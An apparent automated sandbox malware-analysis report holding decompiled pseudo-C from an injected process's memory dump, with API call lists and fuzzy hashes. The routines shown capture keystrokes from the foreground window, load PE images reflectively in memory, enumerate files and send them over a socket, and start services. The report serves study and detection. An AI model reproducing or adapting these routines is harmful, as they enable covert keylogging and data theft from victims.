                0x004538e6
                0x004538e6
                0x004538f2
                0x004538fd
                0x00453900
                0x0045390d
                0x00453910
                0x00453911
                0x00453912
                0x00453918
                0x0045391a
                0x00453920
                0x00453926
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00453928
                0x00453928
                0x00453928
                0x0045392a
                0x00000000
                0x00000000
                0x0045392c
                0x0045392f
                0x00000000
                0x00453935
                0x00453935
                0x00453937
                0x00453939
                0x00453939
                0x00453939
                0x00453941
                0x00453944
                0x00453944
                0x0045394a
                0x0045394c
                0x0045394e
                0x00453955
                0x0045395b
                0x0045395d
                0x00000000
                0x0045395d
                0x00000000
                0x0045392f
                0x00000000
                0x00453928
                0x00000000
                0x004538cc
                0x0045388f
                0x0045388f
                0x00453891
                0x00453897
                0x0045389e
                0x0045389e
                0x004538a1
                0x004538a1
                0x00000000
                0x00453891
                0x00000000
                0x00453975
                0x00453975
                0x00453976
                0x00453976
                0x00000000
                0x0045387b
                0x00453796
                0x00453796
                0x004537a1
                0x004537a8
                0x004537ae
                0x004537b5
                0x004537b6
                0x004537b7
                0x004537bc
                0x004537bf
                0x004537c1
                0x00000000
                0x004537c7
                0x004537c7
                0x004537ca
                0x00000000
                0x004537d0
                0x004537d0
                0x004537d7
                0x00000000
                0x004537dd
                0x004537e3
                0x004537e5
                0x004537eb
                0x004537eb
                0x004537ed
                0x004537ed
                0x004537ef
                0x004537f8
                0x004537ff
                0x00453802
                0x00453803
                0x00453805
                0x00453805
                0x00000000
                0x0045380d
                0x004537d7
                0x004537ca
                0x004537c1
                0x004536fa
                0x004536fa
                0x00453700
                0x00453702
                0x0045371e
                0x00453721
                0x00000000
                0x00453727
                0x00453727
                0x0045372e
                0x00000000
                0x00453734
                0x0045373a
                0x0045373c
                0x00453742
                0x00453742
                0x00453744
                0x00453744
                0x00453746
                0x0045374f
                0x00453756
                0x00453759
                0x0045375a
                0x0045375c
                0x0045375c
                0x00453764
                0x00453764
                0x00453766
                0x00000000
                0x0045376c
                0x0045376c
                0x00453772
                0x00453775
                0x00453a3f
                0x00453a41
                0x00453a42
                0x00453a48
                0x00453a54
                0x00453a5b
                0x00453a5c
                0x00453a5d
                0x00453a62
                0x00453a65
                0x0045377b
                0x0045377b
                0x00453782
                0x00000000
                0x00453782
                0x00453775
                0x00453766
                0x0045372e
                0x00453704
                0x00453704
                0x00453706
                0x0045370c
                0x00453712
                0x00453713
                0x00453990
                0x00453990
                0x00453997
                0x00453998
                0x00453999
                0x0045399e
                0x004539a1
                0x004539a1
                0x004539a1
                0x00453702
                0x004539a3
                0x004539a3
                0x004539a5
                0x00453a6c
                0x00453a73
                0x00453a7a
                0x00453a8d
                0x00453a93
                0x00453a94
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004539ab
                0x004539b1
                0x004539b1
                0x004539b7
                0x004539b7
                0x004539c3
                0x00000000
                0x004539c3
                0x00453200
                0x00453200
                0x00453202
                0x00453208
                0x0045320a
                0x00453210
                0x00453212
                0x00453589
                0x00453589
                0x0045358b
                0x00453591
                0x00453598
                0x0045359a
                0x004535f9
                0x004535fc
                0x00453602
                0x00453608
                0x0045360e
                0x00453610
                0x00453616
                0x00453618
                0x00453618
                0x0045361a
                0x0045361a
                0x0045361c
                0x00453625
                0x0045362c
                0x0045362f
                0x00453630
                0x00453632
                0x00453632
                0x0045363a
                0x0045363c
                0x00453642
                0x00453648
                0x0045364b
                0x00000000
                0x00453651
                0x00453651
                0x00453658
                0x00453658
                0x0045364b
                0x0045363c
                0x00453610
                0x0045359c
                0x0045359c
                0x0045359e
                0x004535a4
                0x004535aa
                0x00000000
                0x004535aa
                0x0045359a
                0x00453218
                0x00453218
                0x00453218
                0x0045321b
                0x0045321f
                0x0045321f
                0x00453220
                0x00453232
                0x0045323f
                0x0045324e
                0x00453278
                0x0045327d
                0x00453283
                0x00453286
                0x0045328c
                0x0045328f
                0x0045330b
                0x00453312
                0x004533d6
                0x004533dc
                0x004533e2
                0x004533e5
                0x004533e7
                0x00453470
                0x004533ed
                0x004533ed
                0x004533f3
                0x004533f3
                0x004533f9
                0x004533ff
                0x00453401
                0x00453403
                0x00453403
                0x00453409
                0x0045340f
                0x00453411
                0x00453419
                0x00453419
                0x0045341f
                0x00453421
                0x00453423
                0x00453429
                0x0045342b
                0x00453542
                0x00453544
                0x0045354a
                0x0045354a
                0x00000000
                0x00453431
                0x00453437
                0x00453437
                0x00453439
                0x0045343f
                0x00453442
                0x00453449
                0x0045344f
                0x00453451
                0x00453478
                0x0045347a
                0x0045347c
                0x0045347e
                0x00453484
                0x0045348a
                0x00453524
                0x00453524
                0x00453527
                0x00000000
                0x0045352d
                0x0045352d
                0x00453533
                0x00000000
                0x00453533
                0x00453490
                0x00453490
                0x00453490
                0x00453493
                0x00000000
                0x00000000
                0x00453495
                0x00453497
                0x00453499
                0x004534a2
                0x004534a2
                0x004534a4
                0x004534aa
                0x004534aa
                0x004534b6
                0x004534c1
                0x004534c4
                0x004534d1
                0x004534d4
                0x004534d5
                0x004534d6
                0x004534dc
                0x004534de
                0x004534e4
                0x004534ea
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004534ec
                0x004534ec
                0x004534ec
                0x004534ee
                0x00000000
                0x00000000
                0x004534f0
                0x004534f3
                0x004535ad
                0x004535ad
                0x004535af
                0x004535b5
                0x004535bb
                0x004535bc
                0x00000000
                0x004534f9
                0x004534f9
                0x004534fb
                0x004534fd
                0x004534fd
                0x004534fd
                0x00453505
                0x00453508
                0x00453508
                0x0045350e
                0x00453510
                0x00453512
                0x00453519
                0x0045351f
                0x00453521
                0x00000000
                0x00453521
                0x00000000
                0x004534f3
                0x00000000
                0x004534ec
                0x00000000
                0x00453490
                0x00453453
                0x00453453
                0x00453455
                0x0045345b
                0x00453462
                0x00453462
                0x00453465
                0x00453465
                0x00000000
                0x00453455
                0x00000000
                0x00453539
                0x00453539
                0x0045353a
                0x0045353a
                0x00000000
                0x0045343f
                0x00453318
                0x00453318
                0x00453323
                0x0045332a
                0x00453330
                0x00453337
                0x00453338
                0x00453339
                0x0045333e
                0x00453341
                0x00453343
                0x0045335f
                0x00453362
                0x00000000
                0x00453368
                0x00453368
                0x0045336f
                0x00000000
                0x00453375
                0x0045337b
                0x0045337d
                0x00453383
                0x00453383
                0x00453385
                0x00453385
                0x00453387
                0x00453390
                0x00453397
                0x0045339a
                0x0045339b
                0x0045339d
                0x0045339d
                0x00000000
                0x00453385
                0x0045336f
                0x00453345
                0x00453347
                0x0045334d
                0x00453353
                0x00453354
                0x00000000
                0x00453354
                0x00453343
                0x00453291
                0x00453291
                0x00453297
                0x00453299
                0x004532ae
                0x004532b1
                0x00000000
                0x004532b7
                0x004532b7
                0x004532be
                0x00000000
                0x004532c4
                0x004532ca
                0x004532cc
                0x004532d2
                0x004532d2
                0x004532d4
                0x004532d4
                0x004532d6
                0x004532df
                0x004532e6
                0x004532e9
                0x004532ea
                0x004532ec

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: 66c88f94bcf76d92480bef0de8e75354ac52460a1e4e9baaabc3b75a61576d9a
                • Instruction ID: ab5b192c1b67bfb1c49c02c59f66a0540b606f502e9411ba0412ed8ffb88480c
                • Opcode Fuzzy Hash: 66c88f94bcf76d92480bef0de8e75354ac52460a1e4e9baaabc3b75a61576d9a
                • Instruction Fuzzy Hash: B7C27D71E046288FDB25CE28DD407EAB3B5EB45346F1441EBD80DE7242E778AE898F45
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E00408909(signed int __ecx, void* __edx, void* __eflags) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t101;
                				intOrPtr* _t106;
                				signed int _t116;
                				void* _t128;
                				void* _t149;
                				void* _t152;
                				signed int _t154;
                				signed int _t167;
                				signed int _t180;
                				signed int _t182;
                				void* _t265;
                				void* _t267;
                				void* _t273;
                				void* _t275;
                				intOrPtr _t276;
                				void* _t277;
                				void* _t280;
                
                				_t182 = __ecx;
                				E00456328(E00456703, _t273);
                				_t276 = _t275 - 0x300;
                				_push(_t265);
                				 *((intOrPtr*)(_t273 - 0x10)) = _t276;
                				_t180 = _t182;
                				 *(_t273 - 0x18) = _t180;
                				E004020BF(_t180, _t273 - 0x9c);
                				 *(_t273 - 0x1c) =  *(_t273 - 0x1c) | 0xffffffff;
                				 *_t180 = 0;
                				 *(_t273 - 4) =  *(_t273 - 4) & 0x00000000;
                				_t260 = _t180 + 4;
                				E0040480D(_t180 + 4);
                				_t101 = E004048A8(_t180 + 4, _t265, _t180 + 4);
                				_t282 = _t101;
                				if(_t101 == 0) {
                					_push(0);
                					_push(0);
                					goto L4;
                				} else {
                					_t276 = _t276 - 0x18;
                					_t258 = E00402F11(_t273 - 0x6c, _t273 + 0x38, _t273, 0x472ec8);
                					E00402EF0(_t180, _t276, _t174, _t273, _t282, _t273 + 0x50);
                					_push(0x64);
                					_t180 = _t180 & 0xffffff00 | E00404A81(_t260, _t174, _t282) == 0xffffffff;
                					E00401FB8();
                					if(_t180 != 0) {
                						E00404E06(_t258);
                						 *((intOrPtr*)(_t273 - 0x20)) = 1;
                						_push(0x46ccd0);
                						_t152 = _t273 - 0x20;
                						L3:
                						_push(_t152);
                						L4:
                						E004379F6();
                					}
                				}
                				_t261 = E004022E5(_t273 + 0x20, _t273 - 0x30);
                				_t106 = E004022AA(_t273 + 0x20, _t273 - 0x34);
                				E00409291(_t273 - 0x3c,  *((intOrPtr*)(E004022E5(_t273 + 0x20, _t273 - 0x38))),  *_t106,  *_t104);
                				_t277 = _t276 + 0xc;
                				_t252 = _t273 + 8;
                				_t267 = FindFirstFileW(E00401EE4(E004087F0(_t273 - 0x6c, _t273 + 8, _t273, "*")), _t273 - 0x304);
                				 *(_t273 - 0x1c) = _t267;
                				E00401EE9();
                				_t285 = _t267 - 0xffffffff;
                				if(_t267 != 0xffffffff) {
                					goto L7;
                				} else {
                					_t276 = _t277 - 0x18;
                					E00402073(_t180, _t276, _t252, _t273, 0x464074);
                					_push(0x65);
                					E00404A81( *(_t273 - 0x18) + 4, _t252, _t285);
                					E00404E06(_t252);
                					 *((intOrPtr*)(_t273 - 0x24)) = 2;
                					_push(0x46ccd0);
                					_t152 = _t273 - 0x24;
                					goto L3;
                				}
                				while(1) {
                					L7:
                					_t116 = FindNextFileW(_t267, _t273 - 0x304);
                					__eflags = _t116;
                					if(_t116 == 0) {
                						break;
                					}
                					_t180 =  *(_t273 - 0x18);
                					__eflags =  *_t180;
                					if( *_t180 == 0) {
                						__eflags =  *(_t273 - 0x304) & 0x00000010;
                						if(( *(_t273 - 0x304) & 0x00000010) == 0) {
                							L17:
                							E0040415E(_t180, _t273 - 0x84, _t252, _t273, _t273 - 0x2d8);
                							_t261 = E004022E5(_t273 - 0x84, _t273 - 0x3c);
                							_t270 = E004022AA(_t273 - 0x84, _t273 - 0x38);
                							E00409291(_t273 - 0x30,  *((intOrPtr*)(E004022E5(_t273 - 0x84, _t273 - 0x34))),  *_t134,  *_t132);
                							_t277 = _t277 + 0xc;
                							__eflags = E00409114(_t273 - 0x84, _t273 + 0x20, 0) - 0xffffffff;
                							if(__eflags == 0) {
                								L20:
                								E00401EE9();
                								_t267 =  *(_t273 - 0x1c);
                								continue;
                							} else {
                								E00401FC2(_t273 - 0x9c, _t252, _t270, E00402097(_t180, _t273 - 0x54, _t252, _t273, __eflags, _t273 - 0x304, 0x250));
                								E00401FB8();
                								_t277 = _t277 - 0x18;
                								_t252 = E00402EF0(_t180, _t273 - 0x54, E0041A879(_t180, _t273 - 0xb4, _t273 + 8), _t273, __eflags, 0x472ec8);
                								E00402EF0(_t180, _t277, _t147, _t273, __eflags, _t273 - 0x9c);
                								_push(0x66);
                								_t149 = E00404A81(_t180 + 4, _t147, __eflags);
                								__eflags = _t149 - 0xffffffff;
                								_t180 = _t180 & 0xffffff00 | _t149 == 0xffffffff;
                								E00401FB8();
                								E00401FB8();
                								__eflags = _t180;
                								if(_t180 == 0) {
                									goto L20;
                								} else {
                									 *((intOrPtr*)(_t273 - 0x2c)) = 4;
                									_push(0x46ccd0);
                									_t152 = _t273 - 0x2c;
                									goto L3;
                								}
                							}
                						} else {
                							_t154 = E0043E224(_t273 - 0x2d8, _t273 - 0x2d8, 0x4644f0);
                							__eflags = _t154;
                							if(_t154 == 0) {
                								goto L17;
                							} else {
                								__eflags = E0043E224(_t273 - 0x2d8, _t273 - 0x2d8, L"..");
                								if(__eflags == 0) {
                									goto L17;
                								} else {
                									_t252 = E00408876(_t180, _t273 - 0xb4, _t273 + 8, _t273, __eflags, E0040415E(_t180, _t273 - 0x54, _t252, _t273, _t273 - 0x2d8));
                									E00402FF4(_t180, _t273 - 0x6c, _t159, _t261, _t273, __eflags, "\\");
                									E00401EE9();
                									E00401EE9();
                									_t280 = _t277 - 0x18;
                									E004086D0(_t180, _t280, _t159, __eflags, _t273 + 0x20);
                									_t277 = _t280 - 0x18;
                									E004086D0(_t180, _t277, _t159, __eflags, _t273 - 0x6c);
                									_t167 = E00408D1B(_t180, _t159, __eflags);
                									__eflags = _t167;
                									if(_t167 != 0) {
                										E00401EE9();
                										goto L17;
                									} else {
                										 *((intOrPtr*)(_t273 - 0x28)) = 3;
                										_push(0x46ccd0);
                										_t152 = _t273 - 0x28;
                										goto L3;
                									}
                								}
                							}
                						}
                						L23:
                						E00401FB8();
                						E00401EE9();
                						E00401EE9();
                						E00401FB8();
                						_t128 = E00401FB8();
                						 *[fs:0x0] =  *((intOrPtr*)(_t273 - 0xc));
                						return _t128;
                					} else {
                						FindClose(_t267);
                					}
                					L10:
                					E00404E06(_t252);
                					goto L23;
                				}
                				 *(_t273 - 4) =  *(_t273 - 4) | 0xffffffff;
                				FindClose(_t267);
                				_t252 = E00402F11(_t273 - 0x54, _t273 + 0x38, _t273, 0x472ec8);
                				E00402EF0(_t180, _t277 - 0x18, _t119, _t273, __eflags, _t273 + 0x50);
                				_push(0x67);
                				E00404A81( *(_t273 - 0x18) + 4, _t119, __eflags);
                				E00401FB8();
                				goto L10;
                 			}

                APIs
                • __EH_prolog.LIBCMT ref: 0040890E
                  • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                • __CxxThrowException@8.LIBVCRUNTIME ref: 004089AA
                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A08
                • FindNextFileW.KERNEL32(00000000,?), ref: 00408A60
                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408A77
                  • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                  • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                  • Part of subcall function 00404E06: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                • FindClose.KERNEL32(00000000), ref: 00408C6F
                  • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00472EE0,?), ref: 00404B27
                  • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00472EE0,?,?,?,?,?,?,0040545D), ref: 00404B55
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                • String ID:
                • API String ID: 1824512719-0
                • Opcode ID: f65f91661afe7f647343ce44d55ee458c5554bda9336a5833d0de8d2a30ad031
                • Instruction ID: d8a72a11d5b22176fcc9823f728123f790ce651a5e6d51f59b88b1622e7f2630
                • Opcode Fuzzy Hash: f65f91661afe7f647343ce44d55ee458c5554bda9336a5833d0de8d2a30ad031
                • Instruction Fuzzy Hash: F1B17D729001099BCB14FBA1DD96AEDB378AF40318F50417FF506B61D2EF386A49CB99
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00411241(intOrPtr* __ecx, intOrPtr __edx, void* __eflags) {
                				signed int _t52;
                				signed int _t55;
                				void* _t58;
                				signed int _t66;
                				signed int _t68;
                				void* _t73;
                				signed int _t74;
                				void* _t75;
                				signed int _t77;
                				signed int _t78;
                				signed int _t80;
                				signed int _t81;
                				signed int _t82;
                				void* _t86;
                				signed int _t87;
                				intOrPtr* _t90;
                				signed int _t104;
                				void* _t106;
                				signed int _t109;
                				void* _t115;
                				void* _t116;
                				signed int _t117;
                				signed int _t119;
                				void* _t121;
                				signed int _t123;
                				signed int _t126;
                				void* _t127;
                				void* _t128;
                
                				_t106 = 0x40;
                				 *((intOrPtr*)(_t127 + 0x10)) = __edx;
                				 *((intOrPtr*)(_t127 + 0xc)) = __ecx;
                				_t119 = 0;
                				if(E00410CDF(__edx, _t106) != 0) {
                					__eflags =  *__ecx - 0x5a4d;
                					if( *__ecx == 0x5a4d) {
                						_t52 = E00410CDF(__edx,  *((intOrPtr*)(__ecx + 0x3c)) + 0xf8);
                						__eflags = _t52;
                						if(_t52 == 0) {
                							goto L1;
                						}
                						_t90 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
                						__eflags =  *_t90 - 0x4550;
                						if( *_t90 != 0x4550) {
                							goto L3;
                						}
                						__eflags =  *((intOrPtr*)(_t90 + 4)) - 0x14c;
                						if( *((intOrPtr*)(_t90 + 4)) != 0x14c) {
                							goto L3;
                						}
                						__eflags =  *(_t90 + 0x38) & 0x00000001;
                						if(( *(_t90 + 0x38) & 0x00000001) != 0) {
                							goto L3;
                						}
                						_t109 =  *(_t90 + 6) & 0x0000ffff;
                						_t55 =  *(_t90 + 0x14) & 0x0000ffff;
                						__eflags = _t109;
                						if(_t109 == 0) {
                							L14:
                							__imp__GetNativeSystemInfo(_t127 + 0x18, _t115);
                							_t116 = E00410CCE( *((intOrPtr*)(_t90 + 0x50)),  *((intOrPtr*)(_t127 + 0x1c)));
                							_t58 = E00410CCE(_t119,  *((intOrPtr*)(_t127 + 0x1c)));
                							__eflags = _t116 - _t58;
                							if(_t116 == _t58) {
                								_push(0);
                								_t126 = E004111E6( *((intOrPtr*)(_t90 + 0x34)), _t116, 0x3000, 0x40);
                								_t128 = _t127 + 0x14;
                								__eflags = _t126;
                								if(_t126 != 0) {
                									L20:
                									_t117 = HeapAlloc(GetProcessHeap(), 8, 0x40);
                									__eflags = _t117;
                									if(_t117 != 0) {
                										 *(_t117 + 4) = _t126;
                										 *((intOrPtr*)(_t117 + 0x1c)) = E004111E6;
                										 *(_t117 + 0x14) = ( *(_t90 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
                										 *((intOrPtr*)(_t117 + 0x20)) = E004111FD;
                										 *((intOrPtr*)(_t117 + 0x24)) = E00411210;
                										 *((intOrPtr*)(_t117 + 0x28)) = E0041121B;
                										 *((intOrPtr*)(_t117 + 0x2c)) = E0041122A;
                										 *((intOrPtr*)(_t117 + 0x34)) = 0;
                										 *((intOrPtr*)(_t117 + 0x3c)) =  *((intOrPtr*)(_t128 + 0x1c));
                										_t66 = E00410CDF( *((intOrPtr*)(_t128 + 0x14)),  *((intOrPtr*)(_t90 + 0x54)));
                										__eflags = _t66;
                										if(_t66 == 0) {
                											L34:
                											E004115BA(_t117);
                											L35:
                											_t68 = 0;
                											__eflags = 0;
                											L36:
                											return _t68;
                										}
                										_push(0);
                										_t121 = E004111E6(_t126,  *((intOrPtr*)(_t90 + 0x54)), 0x1000, 4);
                										E004351E0(_t121,  *((intOrPtr*)(_t128 + 0x28)),  *((intOrPtr*)(_t90 + 0x54)));
                										_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x30)) + 0x3c)) + _t121;
                										 *_t117 = _t73;
                										 *(_t73 + 0x34) = _t126;
                										_t74 = E00410CF2( *((intOrPtr*)(_t128 + 0x34)), _t90, _t117);
                										__eflags = _t74;
                										if(_t74 == 0) {
                											goto L34;
                										}
                										_t75 =  *_t117;
                										_t114 =  *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34));
                										__eflags =  *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34));
                										if( *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34))) {
                											_t123 = 1;
                											__eflags = 1;
                											 *((intOrPtr*)(_t117 + 0x18)) = 1;
                										} else {
                											 *((intOrPtr*)(_t117 + 0x18)) = E00410FF6(_t114);
                											_t123 = 1;
                										}
                										__eflags = E004110A2(_t117);
                										if(__eflags != 0) {
                											_t77 = E00410E92(_t117, __eflags);
                											__eflags = _t77;
                											if(_t77 == 0) {
                												goto L34;
                											}
                											_t78 = E00410FC5(_t117);
                											__eflags = _t78;
                											if(_t78 == 0) {
                												goto L34;
                											}
                											_t80 =  *( *_t117 + 0x28);
                											__eflags = _t80;
                											if(_t80 == 0) {
                												_t48 = _t117 + 0x38;
                												 *_t48 =  *(_t117 + 0x38) & 0x00000000;
                												__eflags =  *_t48;
                												L41:
                												_t68 = _t117;
                												goto L36;
                											}
                											_t81 = _t80 + _t126;
                											__eflags =  *(_t117 + 0x14);
                											if( *(_t117 + 0x14) == 0) {
                												 *(_t117 + 0x38) = _t81;
                												goto L41;
                											}
                											_t82 =  *_t81(_t126, _t123, 0);
                											__eflags = _t82;
                											if(_t82 != 0) {
                												 *((intOrPtr*)(_t117 + 0x10)) = _t123;
                												goto L41;
                											}
                											SetLastError(0x45a);
                										}
                										goto L34;
                									}
                									_push(0);
                									E004111FD(_t126, 0, 0x8000);
                									L19:
                									SetLastError(0xe);
                									L16:
                									goto L35;
                								}
                								_push(0);
                								_t126 = E004111E6(0, _t116, 0x3000, 0x40);
                								_t128 = _t128 + 0x14;
                								__eflags = _t126;
                								if(_t126 != 0) {
                									goto L20;
                								}
                								goto L19;
                							}
                							SetLastError(0xc1);
                							goto L16;
                						}
                						_t104 = _t90 + 0x24 + _t55;
                						__eflags = _t104;
                						do {
                							__eflags =  *(_t104 + 4);
                							_t86 =  *_t104;
                							if( *(_t104 + 4) != 0) {
                								_t87 = _t86 +  *(_t104 + 4);
                								__eflags = _t87;
                							} else {
                								_t87 = _t86 +  *(_t90 + 0x38);
                							}
                							__eflags = _t87 - _t119;
                							_t119 = (_t87 > _t119) ? _t87 : _t119;
                							_t104 = _t104 + 0x28;
                							_t109 = _t109 - 1;
                							__eflags = _t109;
                						} while (_t109 != 0);
                						goto L14;
                					}
                					L3:
                					SetLastError(0xc1);
                				}
                				L1:
                				return 0;
                			}

                APIs
                  • Part of subcall function 00410CDF: SetLastError.KERNEL32(0000000D,0041125F,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041123D), ref: 00410CE5
                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041123D), ref: 0041127A
                • GetNativeSystemInfo.KERNEL32(?,0040C7AB,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041123D), ref: 004112E8
                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0041130C
                  • Part of subcall function 004111E6: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,0041132A,?,00000000,00003000,00000040,00000000,?,?), ref: 004111F6
                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411353
                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0041135A
                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041146D
                  • Part of subcall function 004115BA: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041147A,?,?,?,?,?), ref: 0041162A
                  • Part of subcall function 004115BA: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00411631
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                • String ID:
                • API String ID: 3950776272-0
                • Opcode ID: bd525cc1913b0ea8265babaacec09d0fcbdf2b7538008eea0c1f98325fc720c9
                • Instruction ID: 0cb4cb50e04e4c00dda63c2048a6518c68fbc69f33767e983cf50f1e9feca01c
                • Opcode Fuzzy Hash: bd525cc1913b0ea8265babaacec09d0fcbdf2b7538008eea0c1f98325fc720c9
                • Instruction Fuzzy Hash: 7F61D470605201ABD7109F66CD81BAB7BA5BF44740F04416AFE05977A2EBBCD8C1CBD9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E004099E3(void* __ecx, intOrPtr _a4) {
                				long _v8;
                				void _v38;
                				short _v40;
                				char _v296;
                				void* __ebx;
                				void* __edi;
                				void* __ebp;
                				struct HKL__* _t20;
                				void* _t30;
                				signed int _t32;
                				void* _t36;
                				void* _t37;
                				void* _t41;
                
                				_t30 = __ecx;
                				E00435760(_t37,  &_v296, 0, 0x100);
                				_v40 = 0;
                				_t32 = 7;
                				memset( &_v38, 0, _t32 << 2);
                				asm("stosw");
                				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
                				GetKeyState(0x10);
                				GetKeyboardState( &_v296);
                				ToUnicodeEx( *(_t30 + 0x4c),  *(_t30 + 0x50),  &_v296,  &_v40, 0x10, 0, _t20);
                				E0040415E(_t30, _a4, _t36, _t41,  &_v40);
                				return _a4;
                			}

                APIs
                • GetForegroundWindow.USER32(00000000,?,00000000), ref: 00409A17
                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409A22
                • GetKeyboardLayout.USER32 ref: 00409A29
                • GetKeyState.USER32(00000010), ref: 00409A33
                • GetKeyboardState.USER32(?), ref: 00409A40
                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409A5C
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                • String ID:
                • API String ID: 3566172867-0
                • Opcode ID: 677c15e1911c7d5858dbd143638b3e9bc5ab1a814779878d35ced18a05c88380
                • Instruction ID: aeedf37edc6dd1a703413de17d62dd48ee8b6b0f748b25ac56bea9041ac92ee6
                • Opcode Fuzzy Hash: 677c15e1911c7d5858dbd143638b3e9bc5ab1a814779878d35ced18a05c88380
                • Instruction Fuzzy Hash: 35110C7290020CABDB109BA4ED49FDA77ACEB0C316F1004B5FE05E6191E675AA54DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004195A5(char _a4) {
                				signed int _t14;
                				void* _t17;
                				void* _t18;
                
                				_t14 = 0;
                				_t18 = OpenSCManagerW(0, 0, 0x10);
                				_t17 = OpenServiceW(_t18, E00401EE4( &_a4), 0x10);
                				if(_t17 != 0) {
                					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
                					CloseServiceHandle(_t18);
                					CloseServiceHandle(_t17);
                				} else {
                					CloseServiceHandle(_t18);
                				}
                				E00401EE9();
                				return _t14;
                			}

                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,004191FB,00000000), ref: 004195AE
                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,004191FB,00000000), ref: 004195C3
                • CloseServiceHandle.ADVAPI32(00000000,?,004191FB,00000000), ref: 004195D0
                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,004191FB,00000000), ref: 004195DB
                • CloseServiceHandle.ADVAPI32(00000000,?,004191FB,00000000), ref: 004195ED
                • CloseServiceHandle.ADVAPI32(00000000,?,004191FB,00000000), ref: 004195F0
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandle$Open$ManagerStart
                • String ID:
                • API String ID: 276877138-0
                • Opcode ID: 46d7a5748c115b06c05da62377f7d8103201d003051ebdc645d0e909444f461a
                • Instruction ID: 9846d5d3bfd465166b522490e3d014472adb2eb81bdb42509a6f537d7eac31bb
                • Opcode Fuzzy Hash: 46d7a5748c115b06c05da62377f7d8103201d003051ebdc645d0e909444f461a
                • Instruction Fuzzy Hash: 43F0E9721052247FD2119F20BCC8DFF27ECDF81BA6B00043AF501921D18F68CD45A5B5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E00450558(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, char _a12) {
